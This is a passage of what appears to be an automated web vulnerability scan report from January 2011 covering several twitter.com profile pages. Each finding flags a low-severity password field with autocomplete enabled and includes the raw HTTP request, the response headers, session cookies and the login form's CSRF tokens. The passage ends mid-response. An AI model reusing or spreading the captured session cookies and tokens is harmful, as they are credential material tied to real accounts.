Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266042-1314-53197
ETag: "57db21f7394d7e31ecaad1a1f749d095"
Last-Modified: Sat, 29 Jan 2011 01:54:02 GMT
X-Runtime: 0.01554
Content-Type: text/html; charset=utf-8
Content-Length: 51916
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="d140f82d37064f1ad47f4e608aeb20af04cd3f65" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.88. http://twitter.com/cowboy

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /cowboy

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /cowboy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-85333-1036
ETag: "257ca8de3359b561c58908e572d9840c"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.01434
Content-Type: text/html; charset=utf-8
Content-Length: 52646
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="6891fbad165a044860079e81bf5d64bb46c82b6d" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.89. http://twitter.com/creationix

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /creationix

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /creationix HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225038-68082-17773
ETag: "b84f4f9cc8d7f0be4a449ccb6ba5ef8c"
Last-Modified: Fri, 28 Jan 2011 14:30:38 GMT
X-Runtime: 0.01145
Content-Type: text/html; charset=utf-8
Content-Length: 52514
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="860f396bae9ea1b5179ec68b3536c123a1d892d8" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.90. http://twitter.com/dandenney

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /dandenney

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /dandenney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225059-14036-20243
ETag: "b216b5fbcf2d794e1118d2a88b30a946"
Last-Modified: Fri, 28 Jan 2011 14:30:59 GMT
X-Runtime: 0.01217
Content-Type: text/html; charset=utf-8
Content-Length: 54426
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="ff8336b00b2ed367a4006c9b9e5e84ff1a55c0e8" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.91. http://twitter.com/danwrong

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /danwrong

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /danwrong HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225044-52425-1613
ETag: "e308391ad5a4a27e5094e4fd0c33693a"
Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT
X-Runtime: 0.01151
Content-Type: text/html; charset=utf-8
Content-Length: 50051
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="8edd7c70a156670bdba059335b0f584e894fc454" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.92. http://twitter.com/davevogler

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /davevogler

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /davevogler HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225046-53952-21746
ETag: "2ad3827a054ebfaafa3ae7d33a059d42"
Last-Modified: Fri, 28 Jan 2011 14:30:46 GMT
X-Runtime: 0.01106
Content-Type: text/html; charset=utf-8
Content-Length: 53247
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="2344f6ed79ba8bf204063fa1b01646d6cf7ffd94" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.93. http://twitter.com/deionbranch84

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /deionbranch84

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /deionbranch84 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265287-45791-20728
ETag: "cf921750730cd97318f25ed57b09cad3"
Last-Modified: Sat, 29 Jan 2011 01:41:27 GMT
X-Runtime: 0.01145
Content-Type: text/html; charset=utf-8
Content-Length: 50211
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="85af925a7d1aabe471b2eb6a231c78f800640a1c" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.94. http://twitter.com/dougneiner

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /dougneiner

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /dougneiner HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225073-41249-57241
ETag: "a0613392b43e537b2e040e0724b95bf7"
Last-Modified: Fri, 28 Jan 2011 14:31:13 GMT
X-Runtime: 0.01266
Content-Type: text/html; charset=utf-8
Content-Length: 53641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="15b8810b1751336336795bbe55a2e5d60f033970" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.95. http://twitter.com/ebello

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /ebello

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /ebello HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225040-69634-53816
ETag: "ec4d064b3111971c1cbbd076806b6c98"
Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT
X-Runtime: 0.01003
Content-Type: text/html; charset=utf-8
Content-Length: 54961
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="3b97f6321d728a45b5344f7e9e32fb29bd4b2d31" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.96. http://twitter.com/ericmmartin

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /ericmmartin

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /ericmmartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224922-26410-25724
ETag: "b52f4470d0eb7102204e56e131ce2f8f"
Last-Modified: Fri, 28 Jan 2011 14:28:42 GMT
X-Runtime: 0.50069
Content-Type: text/html; charset=utf-8
Content-Length: 58034
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiNodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW46DGNzcmZfaWQiJTgyOTI5MWZkOGU2YmQxN2QxYTRkYzlmMDFlZjViZDVk%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE%253D--aec68d2fd0935035e3877d8879d09c5b64c00398; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="3667d818efab835db5850fc843293c79c4934e0a" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.97. http://twitter.com/gercheq

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /gercheq

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /gercheq HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225077-54075-30524
ETag: "4793986d74da0ff9abc545ba99de39af"
